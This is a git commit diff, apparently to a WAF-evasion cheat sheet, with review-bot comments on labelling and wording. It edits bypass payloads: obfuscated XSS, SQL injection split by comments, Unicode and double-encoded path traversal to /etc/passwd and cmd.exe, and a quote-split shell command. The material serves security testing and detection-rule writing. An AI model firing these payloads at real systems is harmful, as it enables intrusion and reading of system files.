Added more WAF fingerprints. Total

This commit is contained in:
0xInfection 2019-03-06 18:45:55 +05:30
parent 78ed134c5e
commit 1961230c2c

@ -1857,7 +1857,7 @@ __Standard__: `<script>alert()</script>`
__Bypassed__: `<ScRipT>alert()</sCRipT>` __Bypassed__: `<ScRipT>alert()</sCRipT>`
__Standard__: `SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'` __Standard__: `SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'`
__Bypassed__: `sELecT * FrOM all_tables whERe OWNER = 'DATABASE_NAME'` __Bypassed__: `sELecT * FrOm all_tables whERe OWNER = 'DATABASE_NAME'`
__2. URL Encoding__ __2. URL Encoding__
- Encode normal payloads with % encoding/URL encoding. - Encode normal payloads with % encoding/URL encoding.
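Review bot: The one changed line in this hunk, the SQL `__Bypassed__` example, only flips the case of a single letter (`FrOM` to `FrOm`), and the commit subject ("Added more WAF fingerprints") does not cover it. Put the touch-ups to the evasion examples in their own commit with a message that says what they correct, so the fingerprint additions can be reviewed and reverted independently of them.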
@ -1875,11 +1875,11 @@ __3. Unicode Encoding__
- ASCII characters in unicode encoding encoding provide great variants for bypassing. - ASCII characters in unicode encoding encoding provide great variants for bypassing.
- You can encode entire/part of the payload for obtaining results. - You can encode entire/part of the payload for obtaining results.
__Standard__: `prompt()` __Standard__: `<marquee onstart=prompt()>`
__Obfuscated__: `\u0070r\u06f\u006dpt()` __Obfuscated__: `<marquee onstart=\u0070r\u06f\u006dpt()>`
__Blocked__: `/?redir=http://google.com` __Blocked__: `/?redir=http://google.com`
__Bypassed__: `/?redir=http://google。com` __Bypassed__: `/?redir=http://google。com` (Unicode alternative)
__Standard__: `../../etc/passwd` __Standard__: `../../etc/passwd`
__Obfuscated__: `%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFpasswd` __Obfuscated__: `%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFpasswd`
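Review bot: The first context line of this hunk still reads "unicode encoding encoding"; the lines directly below it are being edited, so drop the repeated word in the same change. The new `(Unicode alternative)` annotation on the `google。com` line is the only explanation in the block and does not name the character that was substituted. State which character it is, and give the `\u…` and `%C0AE…` lines a matching one-line note, so a reader writing normalisation or detection rules can tell which decoding step each variant depends on.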
@ -1910,8 +1910,8 @@ __6. Using Comments__
__Blocked__: `<script>alert()</script>` __Blocked__: `<script>alert()</script>`
__Bypassed__: `<!--><script>alert/**/()/**/</script>` __Bypassed__: `<!--><script>alert/**/()/**/</script>`
__Blocked__: `/?id=1+union+select+1,2,3---` __Blocked__: `/?id=1+union+select+1,2,3--`
__Bypassed__: `/?id=1+un/**/ion+sel/**/ect+1,2,3-` __Bypassed__: `/?id=1+un/**/ion+sel/**/ect+1,2,3--`
__7. Double Encoding__ __7. Double Encoding__
- Often WAF filters tend to encode characters to prevent attacks. - Often WAF filters tend to encode characters to prevent attacks.
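Review bot: The edited SQL pair is labelled `__Blocked__`/`__Bypassed__`, while other examples in this same patch (the `prompt()` and `../../etc/passwd` pairs, and the double-encoding pairs) use `__Standard__`/`__Obfuscated__` for the same before/after relationship. Either use one pair of labels throughout or define the difference once near the top of the section; as it stands a reader cannot tell whether "Blocked" means the request was observed to be rejected by a specific product or is just the unmodified form.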
@ -1920,8 +1920,8 @@ __7. Double Encoding__
__Standard__: `http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\` __Standard__: `http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\`
__Obfuscated__: `http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\` __Obfuscated__: `http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\`
__Standard__: `<script>alert('XSS')</script>` __Standard__: `<script>alert()</script>`
__Obfuscated__: `%253Cscript%253Ealert('XSS')%253C%252Fscript%253E` __Obfuscated__: `%253Cscript%253Ealert()%253C%252Fscript%253E`
__8. Wildcard Encoding__ __8. Wildcard Encoding__
- Globbing patterns are used by various command-line utilities to work with multiple files. - Globbing patterns are used by various command-line utilities to work with multiple files.
@ -1944,7 +1944,7 @@ __Standard__: `<svg/onload-location=javascript:alert%281%29;//`
__Obfuscated__: ```<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//``` __Obfuscated__: ```<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//```
__Standard__: `/bin/cat /etc/passwd` __Standard__: `/bin/cat /etc/passwd`
__Obfuscated__: `/bi'n'''/c''at' /e'tc'/pa'''ss'wd` __Obfuscated__: `/bi'n'''/c''at' /e'tc'/pa''ss'wd`
> Bash allows path concatenation for execution. > Bash allows path concatenation for execution.
__Standard__: `<iframe/onload='this["src"]="javascript:alert()"';>` __Standard__: `<iframe/onload='this["src"]="javascript:alert()"';>`
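Review bot: The quote-count fix on the `/etc/passwd` line is justified only by the context line "Bash allows path concatenation for execution", which is too loose for a reader to check the edited string against. Reword it to say what the shell actually does: paired quotes are removed and adjacent quoted and unquoted pieces are joined into a single word before the command runs. With that stated, it is also clear to rule authors that matching has to happen after quote removal rather than on the raw string.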